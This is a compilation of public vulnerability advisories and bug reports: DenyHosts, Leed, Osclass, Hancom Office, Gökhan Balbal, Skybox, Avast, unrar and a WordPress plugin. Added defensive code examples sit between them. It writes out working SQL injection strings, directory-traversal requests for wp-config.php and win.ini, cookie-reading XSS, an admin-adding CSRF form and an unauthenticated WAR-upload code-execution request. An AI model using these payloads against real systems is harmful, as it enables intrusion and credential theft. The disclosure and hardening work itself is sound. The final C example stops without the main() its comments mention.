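An open redirect such as the _EXT_LANG_redirect case above is fixed by validating the redirect target on the server before the Location header is issued. The following Python function is an added example (not dotCMS code) of an allowlist check that also handles the usual bypasses: scheme-relative //host URLs, backslashes that browsers treat as forward slashes, userinfo tricks such as http://127.0.0.1@other/, and non-HTTP schemes. The set of allowed hosts is an assumption for the example.

```python
from urllib.parse import urlsplit

SAFE_DEFAULT = "/"


def safe_redirect_target(raw, allowed_hosts, default=SAFE_DEFAULT):
    """Return raw if it is an acceptable redirect target, otherwise default.

    Accepted: a single-slash absolute path ("/c/portal/layout?x=1") or an
    http(s) URL whose host is in allowed_hosts (assumed allowlist). Everything
    else falls back to default: scheme-relative "//host", "\\" disguised as "/",
    userinfo tricks ("http://good@evil/"), and non-http schemes.
    """
    if not raw:
        return default
    candidate = raw.strip().replace("\\", "/")   # browsers normalise \ to /
    parts = urlsplit(candidate)

    if parts.scheme or parts.netloc:
        # Absolute (or scheme-relative) URL: scheme and host must both pass.
        if parts.scheme.lower() not in ("http", "https"):
            return default
        host = parts.hostname            # strips userinfo and port
        if host is None or host.lower() not in allowed_hosts:
            return default
        return candidate

    # Relative target: must be an absolute path on this site, not "//host".
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return candidate
```

Keeping the allowlist to the application's own hostnames is the point; reflecting whatever arrives in the parameter, which is what the vulnerable handler does, is what makes the redirect usable for phishing.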
-
DenyHosts - 'regex.py' Remote Denial of Service
source: https://www.securityfocus.com/bid/64478/info

DenyHosts is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users.

ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21
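The one-liner above works because the user name chosen by the SSH client is copied verbatim into sshd's "Invalid user ... from ..." log line, and a parser that searches for that phrase anywhere in the line can pick up the attacker-supplied address instead of the real peer. The following Python is an added example (not DenyHosts code and not its actual regex) contrasting a loose pattern of that kind with a hardened one anchored on the sshd[pid]: prefix and on the end of the line, where the address sshd itself appends always sits. The log lines are constructed and use documentation-range addresses.

```python
import re

# Loose pattern in the style of the affected parser: it finds the first
# "Invalid user X from Y" anywhere in the line, so text that sshd copies
# verbatim from the client-chosen user name can supply the host.
# (Constructed for this example; not DenyHosts' actual regex.)
LOOSE_RE = re.compile(r"Invalid user (?P<user>\S+) from (?P<host>\S+)")

# Hardened pattern: anchor on the syslog program field and on the end of the
# line, require the host to look like an IPv4 literal, and let the user name
# be anything in between. A client cannot forge the "sshd[pid]:" prefix or
# the trailing "from <peer> [port N]" that sshd itself appends.
STRICT_RE = re.compile(
    r"sshd\[\d+\]: Invalid user (?P<user>.*) from "
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?: port \d+)?$"
)

# Constructed sample: a normal failed login, then one whose user name embeds a
# fake "Invalid user root from 203.0.113.9" in the hope of getting that
# address blocked. The real peer in both lines is 198.51.100.7.
SAMPLE_LINES = [
    "Dec 20 10:00:01 host sshd[1234]: Invalid user admin from 198.51.100.7",
    "Dec 20 10:00:02 host sshd[1235]: Invalid user Invalid user root from 203.0.113.9 "
    "from 198.51.100.7 port 51122",
    "Dec 20 10:00:03 host sshd[1236]: Accepted publickey for bob from 198.51.100.8 port 5",
]


def valid_ipv4(text):
    parts = text.split(".")
    return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


def extract_loose(line):
    """(user, host) from the first match anywhere in the line, or None."""
    m = LOOSE_RE.search(line)
    return (m.group("user"), m.group("host")) if m else None


def extract_strict(line):
    """(user, host) only when the line has sshd's real structure, or None."""
    m = STRICT_RE.search(line.rstrip())
    if not m or not valid_ipv4(m.group("host")):
        return None
    return (m.group("user"), m.group("host"))


def hosts_to_block(lines, extractor):
    """Peer addresses a DenyHosts-style tool would add to hosts.deny."""
    hosts = []
    for line in lines:
        parsed = extractor(line)
        if parsed:
            hosts.append(parsed[1])
    return hosts
```

With the loose pattern the second line yields 203.0.113.9, an address that never connected, which is the denial of service the advisory describes; with the strict pattern both failed logins resolve to the actual peer.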
-
Leed - 'id' SQL Injection
source: https://www.securityfocus.com/bid/64426/info

Leed is prone to an SQL-injection vulnerability.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/leed/action.php?action=removeFolder&id=[SQL Injection]
-
Osclass - Multiple Input Validation Vulnerabilities
source: https://www.securityfocus.com/bid/64386/info

Osclass is prone to the following input-validation vulnerabilities:

1. A cross-site request-forgery vulnerability
2. Multiple directory-traversal vulnerabilities
3. An SQL-injection vulnerability

Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, to view arbitrary local files and directories within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.

Osclass 3.3 is vulnerable; other versions may also be affected.

Cross-site request forgery:

[!] Exploit Already Tested ... on apache
[^] Error console:- /general/index.php
[?] proof of concept :

<html>
<body onload="javascript:document.forms[0].submit()">
<form name="<empty>" action="http://www.example.com/general/index.php" method=GET enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=page value="">
<input type=hidden size=30 maxlength=30 name=sOrder value="">
<input type=hidden size=30 maxlength=30 name=iOrderType value="">
<td><input type=text size=30 maxlength=250 name=sPattern value=""></td>
<td><input type=text size=30 maxlength=100 name=sCity value=""></td>
<td><input type=text size=30 maxlength=100 name=sRegion value=""></td>
<td><input type=Checkbox size=10 maxlength=10 name=bPic value=""></td>
<td><input type=text size=30 maxlength=250 name=sPriceMin value=""></td>
<td><input type=text size=30 maxlength=100 name=sPriceMax value=""></td>
<td><input type=Checkbox size=10 maxlength=10 name=sCategory value=""></td>
<input type=submit class=button value='Save'>
</form>
</body>
</html>

Directory Traversal:

[!] Exploit Already Tested ... on apache
[^] Error console:- directory traversal allow to dump db
[?] proof of concept :

/general/oc-content/languages/en_US/mail.sql
/general/oc-includes/osclass/installer/basic_data.sql
/general/oc-includes/osclass/installer/pages.sql

exploit
http://www.example.com/general/oc-content/languages/en_US/mail.sql

SQL injection:

[!] Exploit Already Tested ... on apache
[^] Error console:-
1*-URL encoded GET input action was set to -1' or 18 = '16
2*-URL encoded POST input action was set to -1" or 34 = "31
[?] proof of concept :

/general/oc-admin/index.php
/general/index.php

1*- Request

GET /general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2; 9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

2*-

POST /general/index.php HTTP/1.1
Content-Length: 246
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst
-
Hancom Office - '.hml' File Processing Heap Buffer Overflow
source: https://www.securityfocus.com/bid/64499/info

Hancom Office is prone to a remote heap-based buffer-overflow vulnerability.

An attacker can exploit this issue by enticing an unsuspecting victim to open a malicious '.hml' document file.

Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.

Hancom Office 2010 SE 8.5.8 is vulnerable; other versions may also be affected.

<TEXTART Text="AAAAAAAA...(more than 500 bytes)" X0="0" X1="14173" X2="14173" X3="0" Y0="0" Y1="0" Y2="14173" Y3="14173">
-
Gökhan Balbal Script 2.0 - Cross-Site Request Forgery
Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin)

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Sweet People : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Gökhan Balbal
|~Affected Version : v2.0
|~Software : http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html
|~RISK : High
|~Google Keyword : "DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi"
##################++ Exploit ++ ######################################

<html>
<body>
<form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
<input type="hidden" name="kadi" value="knockout" />
<input type="hidden" name="sifre" value="password" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

############################################################
-
Skybox Platform < 7.0.611 - Multiple Vulnerabilities
SEC Consult Vulnerability Lab Security Advisory < 20151210-0 > ======================================================================= title: Multiple Vulnerabilities product: Skybox Platform vulnerable version: <=7.0.611 fixed version: 7.5.401 CVE number: impact: Critical homepage: www.skyboxsecurity.com/products/appliance found: 2014-12-04 by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Skybox Security provides cutting-edge risk analytics for enterprise security management. Our solutions give you complete network visibility, help you eliminate attack vectors, and optimize your security management processes. Protect the network and the business." Source: http://www.skyboxsecurity.com/ Business recommendation: ------------------------ Attackers are able to perform Cross-Site Scripting and SQL Injection attacks against the Skybox platform. Furthermore, it is possible for unauthenticated attackers to download arbitrary files and execute arbitrary code. SEC Consult recommends the vendor to conduct a comprehensive security analysis, based on security source code reviews, in order to identify all available vulnerabilities in the Skybox platform and increase the security of its customers. 
Vulnerability overview/description: ----------------------------------- 1) Multiple Reflected Cross-Site Scripting Vulnerabilities 2) Multiple Stored Cross-Site Scripting Vulnerabilities 3) Arbitrary File Download and Directory Traversal Vulnerability 4) Blind SQL Injection Vulnerability 5) Remote Unauthenticated Code Execution Proof of concept: ----------------- 1) Multiple Reflected Cross-Site Scripting Vulnerabilities Multiple scripts are prone to reflected Cross-Site Scripting attacks. The following example demonstrates this issue with the service VersionRepositoryWebService: POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0 Content-type: text/plain User-Agent: Axis/1.4 Host: localhost:8282 SOAPAction: "" Content-Length: 863 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><ns1:checkV ersion soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85">&l t;a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>9884933253b"><components soapenc:arrayType="soapenc:string[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><components xsi:type="soapenc:string">Application</components></components><os xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">windows-64</os><curre ntVersion xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">7.0.601</currentVersi on></ns1:checkVersion></soapenv:Body></soapenv:Envelope> Other scripts and parameters, such as the parameter status of the login script (located at https://localhost:444/login.html) are affected as well. 
The following request demonstrates this issue:

https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example, when creating a new ticket, the title can be misused to
insert JavaScript code. The following request to the server demonstrates the
issue:

Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]

7|0|18|https://localhost:8443/skyboxview/webskybox/|272....5E|com.skybox.view.gwt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.transfer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phases.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.view.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItemId/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/852682809||skyboxview|test"><img src=yy onerror=alert(document.cookie) >|java.util.ArrayList/41

Other fields, like "Comments" and "Description", are affected as well.

3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows uploading and downloading attachments for
tickets. The download functionality can be exploited to download arbitrary
files, because the client-supplied file name is used without being confined
to the attachment directory. No authentication is required to exploit this
vulnerability.
The following request demonstrates the issue:

POST /skyboxview/webskybox/attachmentdownload HTTP/1.1
Host: localhost:8443

tempShortFileName=aaaaaa&tempFileName=../../../../../../../../../../../windows/win.ini

The script /skyboxview/webskybox/filedownload is also affected by the same
vulnerability.

Note: The upload functionality can also be used to upload files without
authentication.

4) Blind SQL Injection Vulnerability
The "username" parameter of the getUserLockInSeconds method of the service
VersionWebService is vulnerable to SQL injection. The following request
demonstrates this issue with a simple sleep statement; if the injected
sleep() executes, the response is delayed by 20 seconds, which is the only
observable signal (the query result itself is not returned, hence "blind"):

POST https://localhost:8443/skyboxview/webservice/services/VersionWebService HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 619
Host: localhost:8443
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ver="http://com/skybox/view/webservice/version">
  <soapenv:Header/>
  <soapenv:Body>
    <ver:getUserLockInSeconds soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <username xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">admin'+(select * from (select(sleep(20)))a)+'</username>
    </ver:getUserLockInSeconds>
  </soapenv:Body>
</soapenv:Envelope>

No authentication is required to exploit this vulnerability.

5) Remote Unauthenticated Code Execution
It is possible to upload WAR files, containing for example JSP files, which
will be automatically deployed by the Skybox appliance. This way, an attacker
can upload a JSP shell and execute arbitrary commands in the context of the
user running the web server (by default skyboxview). The following request to
the Skyboxview update service (located at https://localhost:9443) uploads a
WAR file (helloworld.war).
It will be written to /opt/skyboxview/thirdparty/jboss/server/web/deploy,
where it is automatically extracted and deployed at
/opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost. The
"../" sequences in the patchName parameter are honoured, so the uploaded
archive can be placed anywhere the service user can write, including the
hot-deploy directory.

POST /skyboxview-softwareupdate/services/CollectorSoftwareUpdate HTTP/1.1
Accept-Encoding: gzip,deflate
SOAPAction: ""
Content-Type: multipart/related; type="text/xml"; start="<rootpart@soapui.org>"; boundary="----=_Part_1_1636307031.1418103287783"
MIME-Version: 1.0
User-Agent: Jakarta Commons-HttpClient/3.1
Host: localhost:9443
Content-Length: 1944

------=_Part_1_1636307031.1418103287783
Content-Type: text/xml; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-ID: <rootpart@soapui.org>

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:sof="http://com/skybox/view/agent/webservice/softwareupdate">
  <soapenv:Header/>
  <soapenv:Body>
    <sof:uploadPatch soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <patchName xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">../../thirdparty/jboss/server/web/deploy/helloworld2.war</patchName>
      <patchData href="cid:helloworld.war"/>
    </sof:uploadPatch>
  </soapenv:Body>
</soapenv:Envelope>

------=_Part_1_1636307031.1418103287783
Content-Type: application/octet-stream; name=helloworld.war
Content-Transfer-Encoding: binary
Content-ID: <helloworld.war>
Content-Disposition: attachment; name="helloworld.war"; filename="helloworld.war"

[binary]

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the Skybox platform
version 7.0.611, which was the most recent version at the time of discovery.

Vendor contact timeline:
------------------------
Communication with the vendor was handled by SEC Consult's client.
Solution:
---------
According to the release notes, the issues have been fixed in the following
versions (reference number "19184"):

7.5.401: Reflected Cross-Site Scripting vulnerabilities
7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and
         Directory Traversal

Users of Skybox are advised to upgrade to version 7.5.401 or higher.

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the
evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about
vulnerabilities and valid recommendation about the risk profile of new
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Heinzl / @2015
-
Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables
Source: https://code.google.com/p/google-security-research/issues/detail?id=554

The attached PEncrypt packed executable causes an OOB write on Avast Server Edition.

(gdb) bt
#0  0xf6f5e64a in EmulatePolyCode(_POLY_INFO*, int) () from /proc/self/cwd/defs/15092301/engine.so
#1  0xf6f7d334 in pencryptMaybeUnpack(CFMap&, _PEEXE_INFO*, asw::root::CGenericFile*, _EXE_UNPACK_INFO*) () from /proc/self/cwd/defs/15092301/engine.so
#2  0xf6f75805 in CPackWinExec::packIsPacked(CFMap&, void**, ARCHIVE_UNPACKING_INFO*) () from /proc/self/cwd/defs/15092301/engine.so
#3  0xf6e8d1a2 in CAllPackers::IsPacked(CFMap&, _SARCHIVERANGE*, unsigned int, unsigned int, unsigned int, unsigned int, CObjectName const*, unsigned int*, unsigned int*, _PEEXE_INFO**) () from /proc/self/cwd/defs/15092301/engine.so
#4  0xf6e784ef in CScanInfo::ProcessPackingReal(CObjectName&, CFMap&, _VIRUSDATAARRAY*, int&, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#5  0xf6e78bdd in CScanInfo::ProcessPacking(CObjectName&, unsigned int, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#6  0xf6e74fbd in CScanInfo::ProcessArea(CObjectName&, unsigned int, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#7  0xf6e752af in CScanInfo::ProcessTopArea(CObjectName&, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#8  0xf6e7d6db in avfilesScanRealMulti () from /proc/self/cwd/defs/15092301/engine.so
#9  0xf6e81915 in avfilesScanReal () from /proc/self/cwd/defs/15092301/engine.so
#10 0x0805d2a5 in avfilesScanReal ()
#11 0x0805498c in engine_scan ()
(gdb) x/i $pc
=> 0xf6f5e64a <_Z15EmulatePolyCodeP10_POLY_INFOi+7194>:	mov    WORD PTR [edx],ax
(gdb) p/x $edx
$7 = 0xe73f181f
(gdb) p/x $ax
$8 = 0x1060

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38931.zip
-
Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption
Source: https://code.google.com/p/google-security-research/issues/detail?id=550

The attached file crashes in CmdExtract::UnstoreFile because the signed int64 DestUnpSize is truncated to an unsigned 32-bit integer. Perhaps CmdExtract::ExtractCurrentFile should sanity check Arc.FileHead.UnpSize early.

I observed this crash in Avast Antivirus, but the origin of the code appears to be the unrar source distribution. I imagine many other antiviruses will be affected, and presumably WinRAR and other archivers.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38930.zip
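The narrowing the report describes, as an added example in C. This is not unrar, WinRAR or Avast code; it reproduces the pattern (a signed 64-bit unpacked size from the archive header used as a 32-bit count) next to the early sanity check the report suggests. The names unp_size, chunk_len_* and the 4 GiB cap MAX_UNP_SIZE are assumptions made for the demo, not identifiers from the affected code.

```c
/* Added example (not unrar, WinRAR or Avast code): the int64 -> uint32
 * narrowing of the unpacked-size header field, and the early sanity check
 * the bug report suggests. All names and the size cap are hypothetical. */
#include <stdint.h>
#include <stdio.h>

/* Largest unpacked size this extractor is willing to honour (chosen for the
 * demo; a real archiver would derive it from free space or a policy). */
#define MAX_UNP_SIZE ((int64_t)1 << 32)     /* 4 GiB */

/* The lossy step: the 64-bit header field becomes a 32-bit count. The cast
 * is explicit here; in the vulnerable code it happens implicitly. */
uint32_t truncate_unp_size(int64_t unp_size)
{
    return (uint32_t)unp_size;
}

/* Chunk length decided on the truncated value, as the buggy path does it:
 * a negative size looks huge, and a size of exactly 4 GiB looks like zero. */
uint32_t chunk_len_truncated(int64_t remaining, uint32_t chunk)
{
    uint32_t rem32 = truncate_unp_size(remaining);
    return chunk < rem32 ? chunk : rem32;
}

/* The check a caller should run once, before any extraction loop starts:
 * the header value must be non-negative and within the configured cap. */
int unp_size_is_sane(int64_t unp_size)
{
    return unp_size >= 0 && unp_size <= MAX_UNP_SIZE;
}

/* Chunk length decided on the full 64-bit value after validation.
 * Returns -1 if the header value is rejected, never a wrapped count. */
int64_t chunk_len_checked(int64_t remaining, uint32_t chunk)
{
    if (!unp_size_is_sane(remaining))
        return -1;
    return (int64_t)chunk < remaining ? (int64_t)chunk : remaining;
}

int main(void)
{
    /* Constructed header values: a normal file, a size that does not fit in
     * 32 bits, and a negative size such as a corrupted header would carry. */
    const int64_t samples[] = { 1500, (int64_t)0x100000010LL, -1 };
    const uint32_t chunk = 4096;   /* bytes read from the archive per pass */

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int64_t s = samples[i];
        printf("UnpSize=%lld truncated=%u write(truncated)=%u write(checked)=%lld\n",
               (long long)s, (unsigned)truncate_unp_size(s),
               (unsigned)chunk_len_truncated(s, chunk),
               (long long)chunk_len_checked(s, chunk));
    }
    return 0;
}
```

The point of the two chunk_len_* functions is that the comparison, not just the storage, has to happen at 64 bits: once the value has been narrowed, a negative UnpSize of -1 is indistinguishable from a legitimate 4 GiB minus one, and 0x100000000 is indistinguishable from an empty file.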
-
Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input
Source: https://code.google.com/p/google-security-research/issues/detail?id=551

The attached Microsoft Access Database causes JetDb::IsExploited4x to be called, which contains an unbounded search for objects.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38932.zip
-
Avast! - Heap Overflow Unpacking MoleBox Archives
Source: https://code.google.com/p/google-security-research/issues/detail?id=552

Trivial fuzzing of molebox archives revealed a heap overflow decrypting the packed image in moleboxMaybeUnpack. This vulnerability is obviously exploitable for remote arbitrary code execution as NT AUTHORITY\SYSTEM.

The attached testcase should cause heap corruption in AvastSvc.exe; please enable page heap if you have trouble reproducing.

HEAP[AvastSvc.exe]: ZwAllocateVirtualMemory failed c0000018 for heap 00310000 (base 0E560000, size 0006B000)
(474.9f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0e5cb478 ebx=0dd70000 ecx=0000d87f edx=0e55f080 esi=00310000 edi=00003bf8
eip=7731836b esp=0be6d338 ebp=0be6d364 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
ntdll!RtlpDeCommitFreeBlock+0x146:
7731836b 80780703        cmp     byte ptr [eax+7],3         ds:002b:0e5cb47f=??

#0  0xf702d588 in asw::root::NewDesCryptBlock(unsigned char*, unsigned int, unsigned char const*, bool, int) ()
#1  0xf702b009 in Mole_DecryptBuffer () from /proc/self/cwd/defs/15092301/engine.so
#2  0xf6f6a124 in moleboxMaybeUnpack(CFMap&, _PEEXE_INFO*, asw::root::CGenericFile*, _EXE_UNPACK_INFO*) ()
#3  0xf6f7630d in CPackWinExec::packGetNext(void*, ARCHIVED_FILE_INFO*) ()
#4  0xf6e8cdf3 in CAllPackers::GetNext(unsigned int, void*, ARCHIVED_FILE_INFO*) ()
#5  0xf6e76fc9 in CScanInfo::ProcessPackingReal(CObjectName&, CFMap&, _VIRUSDATAARRAY*, int&, unsigned int) ()
#6  0xf6e78bdd in CScanInfo::ProcessPacking(CObjectName&, unsigned int, unsigned int) ()
#7  0xf6e74fbd in CScanInfo::ProcessArea(CObjectName&, unsigned int, unsigned int) ()
#8  0xf6e752af in CScanInfo::ProcessTopArea(CObjectName&, unsigned int) ()
#9  0xf6e7d6db in avfilesScanRealMulti ()
#10 0xf6e81915 in avfilesScanReal ()
#11 0x0805d2a5 in avfilesScanReal ()
#12 0x0805498c in engine_scan ()

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38933.zip
-
WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal
source: https://www.securityfocus.com/bid/64587/info

The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input passed in the dew_file parameter of admin-panel/download-file.php.

Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks; the proof of concept below reads wp-config.php, which holds the database credentials and authentication keys of the WordPress installation.

Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
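The Skybox attachmentdownload request (tempFileName), the Skybox uploadPatch request (patchName) and the Dewplayer download-file.php request (dew_file) above are the same defect: a client-supplied file name is joined to a server-side directory without first being confined to it. The following is an added example, not code from Skybox, SEC Consult or the Dewplayer plugin, of a lexical "join under base" check that rejects each of the traversal strings shown on this page; the base directories used in main() and in the checks are hypothetical.

```c
/* Added example (not Skybox, SEC Consult or Dewplayer code): join a
 * client-supplied name under a fixed base directory, or refuse.
 * Base directories in main() are hypothetical. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_PARTS 64

/* Lexically normalise `name` and append it to `base`. Returns 1 and fills
 * `out` on success; returns 0 if the name is absolute, carries a drive
 * letter, climbs above base, is empty after normalisation, or does not fit.
 * Contents of `out` are unspecified on failure. Both '/' and '\\' count as
 * separators, so Windows-style traversal is caught as well. */
int safe_join(const char *base, const char *name, char *out, size_t outlen)
{
    const char *parts[MAX_PARTS];
    size_t lens[MAX_PARTS];
    int n = 0;

    if (name[0] == '/' || name[0] == '\\')
        return 0;                                   /* absolute path */
    if (isalpha((unsigned char)name[0]) && name[1] == ':')
        return 0;                                   /* drive letter, C:\... */

    for (const char *p = name; *p; ) {
        const char *start = p;
        while (*p && *p != '/' && *p != '\\')
            p++;
        size_t len = (size_t)(p - start);
        if (*p)
            p++;                                    /* step over separator */
        if (len == 0 || (len == 1 && start[0] == '.'))
            continue;                               /* "//" or "." */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (n == 0)
                return 0;                           /* ".." would leave base */
            n--;
            continue;
        }
        if (n == MAX_PARTS)
            return 0;
        parts[n] = start;
        lens[n] = len;
        n++;
    }
    if (n == 0)
        return 0;                                   /* nothing left to open */

    size_t used = strlen(base);
    if (used >= outlen)
        return 0;
    memcpy(out, base, used);
    for (int i = 0; i < n; i++) {
        if (used + 1 + lens[i] >= outlen)           /* keep room for the NUL */
            return 0;
        out[used++] = '/';
        memcpy(out + used, parts[i], lens[i]);
        used += lens[i];
    }
    out[used] = '\0';
    return 1;
}

/* Convenience wrappers: yes/no, and the joined path or NULL. */
int path_allowed(const char *base, const char *name)
{
    char buf[512];
    return safe_join(base, name, buf, sizeof buf);
}

const char *joined(const char *base, const char *name)
{
    static char buf[512];
    return safe_join(base, name, buf, sizeof buf) ? buf : NULL;
}

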